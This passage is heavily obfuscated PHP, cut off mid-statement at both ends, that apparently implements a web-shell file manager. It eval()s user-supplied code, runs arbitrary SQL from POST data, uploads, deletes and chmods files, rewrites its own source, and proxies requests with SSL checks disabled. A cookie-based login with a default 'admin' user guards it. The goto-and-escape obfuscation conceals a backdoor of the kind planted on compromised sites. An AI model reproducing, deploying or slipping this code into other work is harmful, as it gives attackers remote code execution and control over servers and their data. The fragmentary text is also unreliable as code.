NiHJe("\x52\151\x67\150\164\163") . "\x20" . $HezPF . "\x22\76" . @WAX6M($ymjik) . "\x3c\x2f\141\76"; goto YTX31; xik3u: echo "\42\76\40\xd\12\x20\40\x20\x20\x3c\164\144\x3e"; goto i3Qag; YTX31: echo "\x3c\164\162\40\x63\154\141\x73\163\75\x22"; goto Lkps3; viFVS: if (!(!empty($dVmsi["\163\150\157\x77\137\144\x69\x72\x5f\163\x69\x7a\145"]) && !HjOES($HezPF))) { goto mNLUL; } goto h3zpE; cU9Yc: goto Nzhex; goto pnK26; hsFmP: echo $qgX0Y; goto xzaP3; nqfRt: echo "\x3c\57\164\144\x3e\xd\12\40\40\x20\x20\74\164\144\76"; goto bLjiG; ORTQO: $DGyLr = end($C6n0f); goto swa5h; k4kOr: $C6n0f = explode("\56", $HezPF); goto ORTQO; HefZ2: astoQ: goto Ajuyv; kldII: echo "\x3c\57\x74\x64\76\xd\12\x20\x20\x20\x20\74\164\144\x3e"; goto JMNKv; pnK26: sb94k: goto vuEnA; ru1T0: $u40BD = HJOES($HezPF) || $zkayn ? '' : mIMD1("\147\172", $ymjik, NIhJE("\103\157\155\x70\x72\x65\x73\x73") . "\x26\x6e\142\163\x70\73\x2e\164\x61\x72\56\x67\x7a", Nihje("\101\162\x63\x68\151\166\151\156\147") . "\x20" . $HezPF); goto IXZnQ; x0qno: } goto riEDP; zMiX7: $s9IZn = new PharData($M3kdW); goto NfshS; ata4H: $HezPF = base64_decode($_GET["\x64\157\x77\x6e\154\157\141\x64"]); goto eA3cW; EWAcH: $kmPKX = empty($_POST["\x73\x71\154"]) ? '' : $_POST["\163\161\154"]; goto RTMD7; vImna: J2qVF: goto wiAbu; ugTYz: echo $kmPKX; goto hFnab; Kmb2e: echo $QxlDp; goto XubBK; FVaRz: $OS8TV["\163\x63\x72\151\160\164"] = isset($OS8TV["\163\x63\x72\151\x70\x74"]) ? $OS8TV["\163\143\x72\x69\x70\164"] : ''; goto lrmn7; irfSf: $s9IZn = new PharData($M3kdW); goto ugDzk; gzJ5V: if (!is_file($JV9b8 . "\56\x67\x7a")) { goto PdA21; } goto XlpAP; b5e89: echo NIhJe("\103\157\x6e\x73\157\154\145"); goto sR36a; UtDuE: Anzbs: goto J_pWW; ZJ5oz: natsort($EA6Qz); goto FRbfA; RHG9m: function mNu5G($lhe3w) { goto kS6Zd; B3E36: ob_start(); goto xwiy3; fkTBB: ob_end_clean(); goto JA6Nc; xwiy3: eval(trim($lhe3w)); goto GuOHN; GawXO: ini_set("\x64\151\163\160\154\x61\x79\x5f\145\x72\x72\157\x72\x73", "\x31"); goto B3E36; kS6Zd: $tvUYt = ini_get("\144\151\163\x70\154\x61\x79\x5f\x65\162\162\x6f\x72\x73"); goto GawXO; JA6Nc: ini_set("\x64\x69\163\x70\x6c\x61\x79\137\145\162\x72\157\x72\163", $tvUYt); goto X8jrL; X8jrL: return $x2pxM; goto Rj6MZ; GuOHN: $x2pxM = ob_get_contents(); goto fkTBB; Rj6MZ: } goto Wb2hD; zFwbk: exit(0); goto JhnIV; mO3Hg: set_time_limit(0); goto zMiX7; cnsu3: $QxlDp = empty($_REQUEST["\x70\x61\x74\x68"]) ? $QxlDp = realpath("\x2e") : realpath($_REQUEST["\x70\x61\164\150"]); goto fHBgS; zLrXV: $PhGcO .= niHJE("\124\x61\163\x6b") . "\x20\42" . nihjE("\101\x72\x63\150\x69\166\x69\156\147") . "\40" . $M3kdW . "\x22\x20" . NiHJe("\144\157\156\145") . "\x2e\x26\156\142\x73\x70\x3b" . MimD1("\x64\157\x77\x6e\154\157\141\144", $QxlDp . $M3kdW, niHJE("\104\157\x77\156\x6c\157\x61\144"), niHje("\x44\x6f\167\x6e\154\157\x61\144") . "\40" . $M3kdW) . "\x26\x6e\142\163\160\x3b\74\x61\40\150\x72\x65\146\75\x22" . $zBDAR . "\x26\144\x65\154\x65\x74\x65\75" . $M3kdW . "\46\160\x61\x74\150\x3d" . $QxlDp . "\x22\x20\x74\151\164\x6c\145\x3d\x22" . nIhJE("\x44\145\x6c\145\164\145") . "\x20" . $M3kdW . "\42\x20\76" . nIhJe("\104\x65\x6c\145\x74\145") . "\74\57\141\76"; goto OR4th; KObIX: uVDgZ: goto Utxrp; bvmno: echo $VEMW5; goto meEej; u0JQD: setcookie($OS8TV["\143\157\157\x6b\x69\x65\137\x6e\x61\x6d\x65"], '', time() - 86400 * $OS8TV["\144\x61\x79\x73\137\141\165\164\x68\157\162\x69\x7a\x61\164\151\x6f\156"]); goto WLc_S; dULO8: mnuak: goto DAYQA; YOg5D: $PhGcO .= "\40" . NiHJE("\114\x6f\147\151\156") . "\x3a\40" . $_POST["\146\x6d\x5f\154\157\147\151\x6e"]["\x6c\157\x67\x69\156"]; goto z9Of2; xRkbF: vWdBF: goto BQyLK; WrVLf: function A8KPH($dro6K, $kIzt3 = '', $GZPy0 = "\141\x6c\x6c", $Ngefz = false) { goto JVnDk; oZM37: if (!((empty($GZPy0) || $GZPy0 == "\141\x6c\x6c" || $BELat($dro6K . "\57" . $ymjik)) && (empty($kIzt3) || preg_match($kIzt3, $ymjik)))) { goto Up2l5; } goto XDVAH; WI_GI: nPNc1: goto Zt1pd; ZswJc: if (!(!empty($GZPy0) && $GZPy0 !== "\141\x6c\x6c")) { goto SxWni; } goto Il7fw; Pavdq: SxWni: goto jNDiF; JVnDk: $ZMNvS = $tNshK = array(); goto IiOK6; Il7fw: $BELat = "\151\163\x5f" . $GZPy0; goto Pavdq; KxXEr: goto MDHQ1; goto WI_GI; ErlOy: $kIzt3 = "\x2f\136" . str_replace("\52", "\50\56\52\51", str_replace("\x2e", "\x5c\x2e", $kIzt3)) . "\44\57"; goto XvEjj; IiOK6: if (empty($kIzt3)) { goto sX0Ij; } goto ErlOy; XDVAH: $ZMNvS[] = $ymjik; goto u2KFz; EoCQU: natsort($ZMNvS); goto pWPCr; XvEjj: sX0Ij: goto ZswJc; jNDiF: if (!@is_dir($dro6K)) { goto q_Zqz; } goto QHVIp; u2KFz: Up2l5: goto RkRq5; Zt1pd: closedir($XWjWR); goto EoCQU; FqeqU: if (!(substr($ymjik, 0, 1) != "\56" || $Ngefz)) { goto AznOk; } goto oZM37; pWPCr: q_Zqz: goto uUVHc; uUVHc: return $ZMNvS; goto ULSbZ; QHVIp: $XWjWR = opendir($dro6K); goto boc5z; D6UuF: if (!(false !== ($ymjik = readdir($XWjWR)))) { goto nPNc1; } goto FqeqU; RkRq5: AznOk: goto KxXEr; boc5z: MDHQ1: goto D6UuF; ULSbZ: } goto xTTeU; UU3Yd: foreach ($V5Ocp as $HezPF) { goto ZRAhG; lZJ88: $EA6Qz[] = $HezPF; goto L51a_; ZRAhG: if (@is_dir($QxlDp . $HezPF)) { goto Yvlld; } goto lZJ88; pW6Hc: Yvlld: goto Ls02Q; Mrjc1: iwLi1: goto pVyRO; Ls02Q: $VHtiJ[] = $HezPF; goto kzZ_p; kzZ_p: uHMBt: goto Mrjc1; L51a_: goto uHMBt; goto pW6Hc; pVyRO: } goto Z8Jzf; fHBgS: $QxlDp = str_replace("\134", "\57", $QxlDp) . "\57"; goto EC2hV; SQvaG: goto NaDuJ; goto uGL0Y; T8d1u: echo nIhjE("\x46\151\154\x65\x20\x6d\x61\156\141\147\145\162") . "\x20\x2d\40" . NIHJE("\105\x64\151\x74") . "\x20\x2d\40" . $QxlDp . $_REQUEST["\x65\144\x69\164"]; goto q_roJ; Exkb0: goto l5IQJ; goto f6bIC; z9Of2: aWncu: goto VsrUA; eyX03: $VHBqZ = !empty(${$VX_H6}) ? json_decode(${$VX_H6}, true) : ''; goto EOQr3; S3mpD: echo "\x20\x3c\57\164\150\76\15\12\40\x20\40\x20\74\x74\x68\40\163\x74\x79\x6c\x65\x3d\42\x77\x68\x69\164\x65\55\163\x70\141\x63\x65\x3a\x6e\x6f\167\162\141\x70\x22\76\x20"; goto LVwfD; W71LV: echo "\x20\x20\x20\40\x20\40\x20\40\40\x20\x20\x20\x3c\x69\x6e\160\165\164\40\x74\x79\x70\145\x3d\x22\163\165\x62\x6d\151\x74\x22\40\156\x61\155\x65\x3d\42\163\141\x76\145\42\40\x76\x61\154\x75\x65\x3d\42"; goto NNiV8; r2Hoz: unlink($JV9b8 . "\56\x67\x7a"); goto Vlsvf; oIMUH: echo niHje("\123\165\x62\x6d\151\x74"); goto OIbSe; w8cxQ: $tQ9jK = file_get_contents("\150\x74\164\x70\x73\x3a\x2f\57\162\141\x77\x2e\147\x69\x74\x68\x75\x62\x75\163\145\162\143\x6f\156\164\x65\156\x74\56\143\x6f\155\57\x44\145\156\61\170\x78\170\x2f\106\151\154\145\x6d\141\x6e\x61\147\x65\162\57\155\x61\x73\164\x65\162\57\x6c\x61\x6e\x67\x75\x61\147\x65\x73\x2f" . $q2HJ9 . "\56\x6a\x73\157\156"); goto e8bfM; ioe0E: SCPBl: goto nqDxs; O0Rv8: echo NIhJe("\x43\141\156\x63\x65\x6c"); goto wbXM2; TsbHK: xTOKe: goto VMd9T; Rgshl: if (!empty($_REQUEST["\x65\144\x69\164"])) { goto XNsx1; } goto a4AwT; qOANo: goto Wi3pE; goto I80un; zosNj: $v6aof = json_encode(array_combine($_POST[$h17u3 . "\137\x6e\x61\x6d\x65"], $_POST[$h17u3 . "\x5f\166\141\154\x75\145"]), JSON_HEX_APOS); goto Nsj2i; HtaqB: osGNn: goto mCjsC; ZqR7s: if (empty($kmPKX)) { goto IWckz; } goto oGddB; bAiQi: yXJvi: goto fwVwS; mYX8y: $PhGcO .= nihJe("\x46\x69\154\145\x20\x75\160\x64\141\x74\x65\x64"); goto ghcFC; gXyOH: V9FDh: goto mYX8y; uGL0Y: kU3wr: goto SiZdt; sAZPa: echo NIHJE("\125\x70\x6c\157\x61\144"); goto FjpzP; fjnXZ: echo "\54\40"; goto udEAw; qBaWO: xjoEh: goto P5KuG; I80un: z1KQW: goto Fc_iL; Yqs7b: $PhGcO .= nIHJE("\x45\162\162\157\162\x20\x6f\x63\x63\165\162\162\145\144"); goto IBKNS; EB4Qk: echo niHJE("\122\x69\x67\x68\164\x73"); goto nBHb3; dekj1: function V4lN8($HezPF, $McrIf, $yRp8n = false) { goto AbMwp; M9efu: if (!(@is_dir($HezPF) && $yRp8n)) { goto ZuQ8Y; } goto L5w73; BKstL: ZuQ8Y: goto QZujY; QZujY: return $kmPKX; goto sgk5L; tS7H1: foreach ($svAp8 as $bfN4t) { $kmPKX = $kmPKX && V4LN8($HezPF . "\x2f" . $bfN4t, $McrIf, true); w7BQM: } goto G9akX; L5w73: $svAp8 = A8KPh($HezPF); goto tS7H1; AbMwp: $kmPKX = @chmod(realpath($HezPF), $McrIf); goto M9efu; G9akX: bw2X9: goto BKstL; sgk5L: } goto BqGhH; tRQtL: $mGXy2 = str_replace("\x27", "\46\43\63\71\x3b", json_encode(json_decode($tQ9jK), JSON_UNESCAPED_UNICODE)); goto TA9PD; kRgmx: echo "\x20\x7c\x20\74\x61\40\150\x72\x65\146\x3d\x22\x3f\x66\x6d\137\x73\x65\164\164\x69\156\x67\163\x3d\x74\162\165\145\42\76" . NIhJe("\123\145\164\x74\x69\x6e\x67\x73") . "\x3c\x2f\141\76"; goto nhuMI; IbOYB: Ob1dK: goto zLrXV; DUhGf: if (empty($PhGcO)) { goto Flpsu; } goto UH05u; UcThM: echo "\42\40\57\76\15\12\x9\11\x9\x9\74\x69\156\160\165\164\x20\x74\x79\x70\x65\75\42\x74\x65\170\164\x22\x20\x6e\141\x6d\x65\75\x22\x64\x69\x72\x6e\141\x6d\x65\42\40\x73\x69\x7a\145\x3d\42\x31\x35\42\x3e\15\xa\11\x9\11\11\x3c\x69\156\160\165\x74\x20\x74\x79\x70\145\75\x22\163\165\142\x6d\151\x74\42\40\x6e\141\155\145\75\x22\155\x6b\144\151\162\42\x20\166\x61\x6c\x75\145\75\x22"; goto mTfcQ; q725k: RxxQR: goto kV2us; X9wqd: echo "\x20\74\x2f\x74\x68\x3e\15\xa\40\40\x20\40\x3c\164\150\40\163\164\171\x6c\145\x3d\x22\167\150\x69\x74\x65\55\x73\x70\x61\143\x65\72\156\x6f\167\x72\141\x70\x22\x3e\40"; goto EB4Qk; jnPNx: YuxLg: goto EWAcH; f6bIC: FCZd2: goto T0B9P; oBxVI: if ($_GET["\x65\144\x69\x74"] == basename(__FILE__)) { goto yvLEw; } goto RqwsZ; RTMD7: $BXCqO = "\163\x71\x6c"; goto xjIMI; hFnab: echo "\x3c\x2f\164\x65\170\164\141\x72\145\141\76\x3c\142\x72\57\76\15\12\11\11\x3c\x69\156\160\165\164\x20\164\x79\x70\x65\x3d\x22\162\x65\163\x65\x74\x22\40\166\141\154\x75\145\75\x22"; goto BnBZQ; zW4ex: echo NihJE("\106\151\x6c\145\156\x61\x6d\145"); goto S3mpD; VSu9x: $OS8TV["\154\157\x67\x69\156"] = isset($OS8TV["\154\157\147\151\156"]) ? $OS8TV["\x6c\x6f\147\x69\x6e"] : "\x61\x64\155\x69\x6e"; goto gSYkd; SNJwa: XNsx1: goto CcATF; r3tTe: echo "\x22\76\15\12\11\11\x9\11\74\x69\x6e\160\x75\164\x20\164\x79\160\145\x3d\x22\150\x69\x64\x64\145\x6e\x22\40\x6e\x61\155\x65\x3d\42\160\x61\x74\150\x22\40\166\x61\x6c\165\145\x3d\x22"; goto Kmb2e; FU_m1: echo $zBDAR; goto i3P_y; rO5fT: if (isset($_POST["\x70\x68\160\x72\165\156"]) && !empty($dVmsi["\x65\156\141\142\x6c\x65\x5f\x70\150\x70\x5f\143\x6f\156\163\157\154\x65"])) { goto De23O; } goto GxkVt; olazH: echo $PhGcO; goto yd6kT; ygFOf: if (!($ejLBD = getimagesize($HezPF))) { goto zYJMt; } goto zVOoR; T0B9P: $PhGcO .= niHJE("\x45\x72\162\157\x72\40\x6f\143\143\165\162\x72\x65\x64"); goto NDs5p; maSx3: echo "\x20"; goto b5e89; QX0Hf: $PhGcO = nIHjE("\x53\x65\164\x74\151\156\x67\x73") . "\x20" . NIhJe("\x64\157\x6e\x65"); goto Xm9kj; JhnIV: giSOO: goto nffBk; MObBX: $PhGcO .= NiHJe("\x45\x72\162\157\162\x20\x6f\143\143\x75\162\x72\145\x64") . "\x3a\x20" . nihJE("\x6e\x6f\40\x66\x69\154\x65\163"); goto XE6xs; GDPyR: $dVmsi = $XkBmx; goto DsY2k; f3jBE: goto Rg7MM; goto gXyOH; BT5B8: if (!isset($_GET["\x69\155\x67"])) { goto TB4_6; } goto roq3Q; nffBk: ez0ny: goto BT5B8; ccdKt: echo "\x22\x3e\xd\xa\x20\x20\40\x20\x20\x20\40\40\x20\40\40\40\x3c\x69\x6e\160\165\x74\x20\164\x79\x70\145\75\42\x73\x75\x62\x6d\151\164\x22\x20\x6e\x61\155\x65\x3d\x22\143\141\156\x63\145\154\x22\x20\x76\x61\154\165\145\x3d\x22"; goto O0Rv8; FmeAS: $uR23x = base64_decode($_GET["\x67\172\x66\x69\154\x65"]); goto e_M0B; Wqvcz: Vgi3Q: goto j5m_u; jqGa_: PEToN: goto yDGhv; A86K9: $PhGcO .= nIhJe("\105\162\162\157\x72\x20\x6f\143\x63\x75\162\162\145\144"); goto IVUD5; NGzre: $PhGcO .= NIHJE("\x46\151\x6c\x65\163\40\x75\x70\x6c\157\141\144\145\x64") . "\x3a\40" . $_FILES["\165\160\x6c\x6f\x61\144"]["\x6e\141\155\145"]; goto Exkb0; NuoC6: if (is_file($JV9b8)) { goto xzyQI; } goto MObBX; GAfob: echo $zBDAR; goto r3tTe; y0WGA: echo $OS8TV["\163\143\162\x69\160\x74"]; goto THyyn; uXtCJ: OIaay: goto qSV2c; On0Qo: $PhGcO = ''; goto B9YvS; L2EBF: WuJcn: goto b3n7a; uJ1bT: echo "\42\76\74\x62\x72\x2f\76\15\xa\40\x20\x20\x20\x20\x20\40\40\x20\40\x20\40\x3c\x69\156\x70\x75\164\40\x74\x79\x70\145\75\42\163\x75\142\x6d\x69\x74\42\x20\x6e\x61\x6d\145\x3d\x22\x73\x61\166\145\x22\x20\x76\141\154\165\x65\x3d\x22"; goto oIMUH; TA9PD: $BFNGe = file_get_contents(__FILE__); goto bKofJ; j5m_u: if (!(isset($_GET["\x70\162\x6f\170\x79"]) && !empty($dVmsi["\x65\156\141\142\x6c\x65\137\160\162\x6f\170\x79"]))) { goto LFM0w; } goto NgiUf; Ndb_3: echo "\74\x2f\x61\x3e\15\12\x9\74\x2f\164\144\76\xd\12\74\x2f\x74\x72\x3e\xd\xa\x3c\x74\162\76\xd\12\x20\40\40\40\74\164\144\x20\x63\154\141\163\x73\75\x22\162\157\x77\61\x22\40\x61\x6c\151\147\156\x3d\x22\x63\145\x6e\164\145\162\x22\76\xd\xa\40\40\40\x20\x20\x20\x20\40\74\x66\157\x72\155\40\156\141\x6d\x65\75\x22\x66\157\162\x6d\61\x22\40\155\x65\164\150\157\x64\x3d\x22\160\x6f\x73\164\42\x20\x61\x63\164\x69\x6f\156\75\42"; goto XxJea; vpUCa: function iUJjt($F0kNo) { goto B4MIk; QYxe3: $MbrJd = mysqli_query($DRKJw, $F0kNo); goto WPbrb; DdIgQ: pLIcZ: goto h7aTa; l1y30: if (!($XYAS0 = mysqli_fetch_assoc($MbrJd))) { goto GYLXh; } goto tLk8b; tLk8b: $lSqbp[] = $XYAS0; goto FCzeB; jH9Tg: Z71Os: goto l1y30; WPbrb: if ($MbrJd === false) { goto pLIcZ; } goto IjKaR; yk2u4: if (!$DRKJw->connect_error) { goto Maw6Q; } goto zeln9; IjKaR: if (empty($MbrJd)) { goto lw9DL; } goto jH9Tg; zeln9: ob_end_clean(); goto fisP6; LRzDw: Maw6Q: goto xVyTd; wn8Sr: GYLXh: goto woRjN; Ngqqt: $DRKJw = vslEe(); goto yk2u4; AqwoX: bLysS: goto W3ea8; fisP6: return $DRKJw->connect_error; goto LRzDw; B4MIk: global $dVmsi; goto PifFF; Nc8Ub: return mysqli_error($DRKJw); goto AqwoX; Q_hBn: $DRKJw->close(); goto jfI8O; Qhwx2: goto bLysS; goto DdIgQ; PifFF: $F0kNo = trim($F0kNo); goto zexdz; e7JwR: $UfgOc = empty($lSqbp) ? '' : var_export($lSqbp, true); goto psgKA; psgKA: ob_end_clean(); goto Q_hBn; jfI8O: return "\x3c\x70\x72\145\x3e" . stripslashes($UfgOc) . "\74\x2f\160\162\x65\76"; goto Qhwx2; zexdz: ob_start(); goto Ngqqt; xVyTd: $DRKJw->set_charset("\x75\164\x66\70"); goto QYxe3; h7aTa: ob_end_clean(); goto Nc8Ub; woRjN: lw9DL: goto e7JwR; FCzeB: goto Z71Os; goto wn8Sr; W3ea8: } goto ZQMsL; CXiK1: $s9IZn->buildFromDirectory($uR23x); goto lJeoC; gokre: fGkUp: goto kl5t1; ptRqd: curl_setopt($AU30p, CURLOPT_SSL_VERIFYHOST, 0); goto Avfz3; serWE: echo $QxlDp; goto UcThM; DSyOH: function Wax6m($HezPF, $seoU0 = false) { goto wTC4X; JHe_q: $ejLBD .= $otVig & 0x8 ? $otVig & 0x400 ? "\163" : "\x78" : ($otVig & 0x400 ? "\x53" : "\x2d"); goto KKnyJ; kdbuQ: ScA5Z: goto CIaFD; wTC4X: $otVig = fileperms($HezPF); goto joy7e; vAmrG: $ejLBD = "\163"; goto QhhY7; ag7lm: $ejLBD = "\x2d"; goto NsWgu; CWd5_: $ejLBD = "\144"; goto Jb9eb; Bb9H8: emz7A: goto ua7Rx; jVLgH: I0BkQ: goto vBI3w; ua7Rx: goto qBL9j; goto yQ9R0; wUWvL: goto emz7A; goto ZmsQi; VcUy0: $ejLBD .= $otVig & 0x20 ? "\x72" : "\55"; goto ofogL; BtMrF: goto GtKXf; goto YVLW8; ZRWuF: if (($otVig & 0x4000) == 0x4000) { goto qo7y5; } goto k5i9R; QhhY7: qBL9j: goto kdbuQ; ba175: if (($otVig & 0xc000) == 0xc000) { goto g0YPL; } goto GwdVU; E5P2i: $ejLBD = "\154"; goto Bb9H8; KLaYz: return $ejLBD; goto gdAeD; c8YFd: $ejLBD = "\160"; goto Moq4E; G1UjP: if (($otVig & 0x1000) == 0x1000) { goto jEohp; } goto VE7nt; GwdVU: if (($otVig & 0xa000) == 0xa000) { goto ipqWp; } goto axiq9; izvnt: $ejLBD .= $otVig & 0x80 ? "\x77" : "\55"; goto ax9c4; Xonmr: $ejLBD = "\143"; goto Efk2Q; ax9c4: $ejLBD .= $otVig & 0x40 ? $otVig & 0x800 ? "\x73" : "\x78" : ($otVig & 0x800 ? "\x53" : "\x2d"); goto VcUy0; joy7e: $ejLBD = ''; goto BKTFI; Jb9eb: m4zwZ: goto M34uC; yQ9R0: g0YPL: goto vAmrG; Efk2Q: DRoPD: goto rkXeb; Moq4E: Zm85B: goto gadbo; bSF4S: T3ylE: goto BtMrF; eMH51: EkLLf: goto Xonmr; NsWgu: GtKXf: goto wUWvL; rkXeb: goto m4zwZ; goto uUPJn; YVLW8: z2KMu: goto ag7lm; ZmsQi: ipqWp: goto E5P2i; BKTFI: if ($seoU0) { goto ScA5Z; } goto ba175; CIaFD: $ejLBD .= $otVig & 0x100 ? "\x72" : "\x2d"; goto izvnt; r5hmv: $ejLBD .= $otVig & 0x2 ? "\x77" : "\x2d"; goto pBgmy; FqGcL: goto Zm85B; goto s0z2y; k5i9R: if (($otVig & 0x2000) == 0x2000) { goto EkLLf; } goto G1UjP; axiq9: if (($otVig & 0x8000) == 0x8000) { goto z2KMu; } goto Wlr4w; Wlr4w: if (($otVig & 0x6000) == 0x6000) { goto I0BkQ; } goto ZRWuF; VE7nt: $ejLBD = "\165"; goto FqGcL; pBgmy: $ejLBD .= $otVig & 0x1 ? $otVig & 0x200 ? "\164" : "\x78" : ($otVig & 0x200 ? "\124" : "\55"); goto KLaYz; KKnyJ: $ejLBD .= $otVig & 0x4 ? "\x72" : "\x2d"; goto r5hmv; uUPJn: qo7y5: goto CWd5_; M34uC: goto T3ylE; goto jVLgH; s0z2y: jEohp: goto c8YFd; ofogL: $ejLBD .= $otVig & 0x10 ? "\x77" : "\55"; goto JHe_q; gadbo: goto DRoPD; goto eMH51; vBI3w: $ejLBD = "\x62"; goto bSF4S; gdAeD: } goto EJb22; XpCP1: if (!(!isset($_COOKIE[$OS8TV["\x63\157\x6f\153\151\145\137\156\141\155\x65"]]) or $_COOKIE[$OS8TV["\143\157\157\153\x69\x65\x5f\156\x61\x6d\x65"]] != $OS8TV["\x6c\157\x67\x69\156"] . "\174" . md5($OS8TV["\x70\x61\x73\163\x77\157\x72\x64"]))) { goto MOe43; } goto tmifO; QrR3S: echo "\74\57\x74\x68\76\15\xa\74\x2f\164\x72\x3e\15\xa\74\x74\x72\76\xd\12\40\40\x20\x20\x3c\164\x64\40\143\x6c\141\163\163\75\x22\x72\157\x77\x32\x22\76\74\164\141\x62\x6c\x65\76\x3c\164\x72\x3e\74\164\144\x3e\x3c\x68\62\76"; goto cxNbs; l5LRg: echo "\40\x7c\x20" . NihJe("\107\145\x6e\x65\162\x61\164\151\x6f\156\40\x74\151\155\145") . "\72\x20" . round($xT4Au, 2); goto vaFhm; YrM9E: BCQiP: goto D4afp; WwiAU: if (file_put_contents(__FILE__, $qCxFq)) { goto RxxQR; } goto A86K9; yQZio: unlink($JV9b8 . "\x2e\x67\172"); goto L2EBF; sI2mJ: if (!is_dir($QxlDp . $_REQUEST["\x72\151\x67\150\x74\163"])) { goto a2UAk; } goto Rayat; Z0xqh: $_COOKIE["\x66\x6d\x5f\x6c\x61\x6e\x67"] = $_POST["\146\x6d\x5f\x6c\141\156\147"]; goto ZOSt1; rc42h: $qCxFq = str_replace("\173\x22" . $JfK9U[1] . "\42\175", $mGXy2, $BFNGe); goto w5HF3; wJqC8: echo "\x2e\x69\155\147\x20\173\xd\xa\x9\142\x61\143\153\x67\x72\157\x75\x6e\x64\x2d\151\x6d\141\147\145\72\40\xd\12\165\x72\154\x28\x22\x64\141\164\141\x3a\x69\155\x61\147\x65\57\160\x6e\x67\73\x62\x61\163\x65\66\x34\54\151\x56\102\x4f\x52\x77\60\x4b\107\x67\157\101\x41\x41\101\116\x53\125\150\x45\125\147\x41\101\101\102\x41\x41\101\x41\101\121\x43\x41\115\101\x41\101\x41\157\114\x51\x39\x54\x41\x41\x41\x41\102\x47\144\102\x54\x55\105\101\x41\113\57\x49\x4e\x77\x57\113\66\x51\x41\101\101\144\x46\x51\x54\x46\x52\106\x37\145\63\164\x2f\146\x33\x39\160\x4a\x2b\146\53\143\x4a\141\x6a\126\x38\161\x36\145\156\160\153\x47\x49\x6d\x2f\x73\106\x4f\x2f\x2b\62\117\63\x39\63\x63\65\x75\142\x6d\57\163\170\x62\144\62\x39\171\x69\155\x64\156\145\106\147\x36\x35\117\x54\x6b\x32\x7a\x6f\131\x36\165\110\151\61\172\x41\123\61\x63\x72\x4a\163\110\x73\x32\x6e\171\x67\x6f\x33\x4e\x72\x62\62\114\x42\x58\162\x59\x74\155\x32\160\65\x41\x2f\x2b\x68\x58\x70\157\122\x71\160\x4b\117\153\x77\162\151\x34\66\x2b\166\162\60\115\x47\x33\66\131\x73\x7a\x36\x75\152\x70\155\x49\66\x41\156\x7a\x55\x79\167\x4c\x2b\57\155\130\126\x53\x6d\x49\x42\x4e\70\x62\x77\x77\152\61\x56\x42\171\x4c\x47\x7a\141\61\x5a\112\x30\x4e\104\x51\x6a\131\123\102\x2f\x39\x4e\152\x77\x5a\66\103\x77\125\x41\163\170\x6b\60\x62\162\x5a\171\127\167\67\x70\155\107\x5a\x34\101\66\x4c\164\x64\153\110\144\x66\x2f\x2b\116\70\x79\157\167\62\x37\142\65\x57\x38\x37\x52\x4e\x4c\132\x4c\x2f\62\x62\x69\120\x37\x77\x41\x41\57\57\107\112\x6c\x35\145\x58\64\116\146\131\163\x61\141\114\147\160\66\x68\61\x62\x2b\x74\57\x2b\x36\x52\x36\70\x46\145\70\x39\x79\x63\x69\x6d\x5a\x64\57\x75\x51\166\63\162\x39\x4e\x75\x70\103\102\x39\71\x56\x32\x35\x61\61\x63\126\x4a\x62\x62\x6e\x48\x68\117\57\70\170\x53\x2b\115\x42\x61\70\x66\104\167\151\x32\x4a\151\64\70\161\x69\57\53\161\117\x64\126\x49\172\x73\63\64\170\57\57\x47\117\130\x49\172\x59\160\65\123\x50\x2f\x73\x78\147\x71\160\x69\x49\143\160\53\x2f\163\151\121\x70\143\155\x70\163\x74\141\x79\x73\x7a\x53\x41\x4e\x75\x4b\x4b\x54\71\x50\x54\60\x34\x75\x4c\151\167\111\x6b\x79\x38\114\144\105\53\163\126\x57\166\161\141\x6d\x38\x65\x2f\166\114\65\111\132\53\x72\154\110\70\x63\116\147\60\70\x43\143\172\67\141\144\x38\x76\x4c\x79\x39\114\x74\x55\61\x71\171\x55\165\132\x34\x2b\162\x35\61\62\53\x38\163\x2f\167\125\160\114\63\x64\x33\144\170\x37\127\61\x66\x47\116\x61\57\70\71\132\62\x63\146\x48\53\163\x35\x6e\66\x4f\152\x6f\x62\x31\131\164\163\67\113\x7a\61\71\146\x58\167\x49\x67\x34\x70\x31\144\x4e\x2b\120\152\64\x7a\x4c\122\60\x2b\x38\160\x64\67\163\x74\x72\x68\x4b\101\x73\x2f\71\150\152\57\71\x42\126\x31\x4b\164\146\x74\x4c\123\61\156\x70\x32\x64\x59\154\112\x53\x5a\x46\126\126\65\114\x52\127\x68\x45\x46\x42\65\162\150\x5a\x2f\x39\x4a\161\60\110\x74\x54\x2f\x2f\x43\x53\153\111\x71\x4a\66\x4b\65\104\53\114\x4e\116\142\x6c\x56\126\166\x6a\115\x30\x34\x37\x5a\115\172\67\145\63\x31\x78\105\x47\57\57\x2f\57\164\113\147\165\66\x77\x41\x41\x41\x4a\x74\60\125\153\x35\124\57\x2f\57\x2f\57\57\57\x2f\57\x2f\57\57\x2f\x2f\57\x2f\x2f\57\57\57\57\x2f\57\x2f\57\57\x2f\57\x2f\57\57\x2f\57\x2f\x2f\x2f\57\57\x2f\x2f\57\57\x2f\x2f\57\x2f\x2f\57\x2f\57\x2f\x2f\57\x2f\x2f\x2f\x2f\x2f\57\57\57\x2f\x2f\57\x2f\x2f\x2f\57\x2f\x2f\57\x2f\x2f\x2f\x2f\57\57\57\57\57\57\57\x2f\57\x2f\57\57\57\57\x2f\57\57\57\x2f\57\57\x2f\x2f\x2f\x2f\57\57\x2f\x2f\x2f\x2f\57\x2f\x2f\x2f\x2f\57\x2f\x2f\x2f\x2f\x2f\x2f\x2f\x2f\57\x2f\x2f\57\57\57\57\x2f\57\x2f\57\x2f\57\x2f\x2f\57\x2f\57\x2f\x2f\57\57\57\x2f\57\57\x2f\57\57\57\57\57\x2f\x2f\57\x2f\x2f\57\x2f\57\57\x2f\57\57\57\x2f\57\57\57\57\x2f\57\x2f\57\57\x2f\x2f\x2f\x2f\57\57\x2f\x2f\57\x2f\x2f\57\x2f\57\x2f\x2f\x2f\x2f\x2f\x2f\x2f\x2f\57\x2f\57\57\57\57\57\x2f\167\103\x56\126\x70\113\x59\101\101\x41\101\x47\x58\122\106\127\x48\x52\x54\142\x32\x5a\60\144\x32\x46\171\x5a\121\102\x42\x5a\x47\71\x69\x5a\123\x42\x4a\x62\127\x46\x6e\132\126\x4a\154\131\127\122\65\x63\143\154\154\120\x41\x41\x41\x41\116\x5a\x4a\x52\x45\x46\x55\x4b\106\116\152\155\113\127\151\120\121\x73\132\115\x4d\170\151\x6d\163\161\120\113\x70\101\x62\x32\115\163\101\132\x4e\x6a\x4c\117\x77\153\172\147\147\x56\155\112\x59\x6e\171\160\x73\57\x51\x45\x35\x39\145\x4b\103\x45\164\102\150\141\x59\106\122\146\152\x5a\165\124\x68\110\x32\x37\154\131\66\153\x71\102\x78\x59\157\x72\123\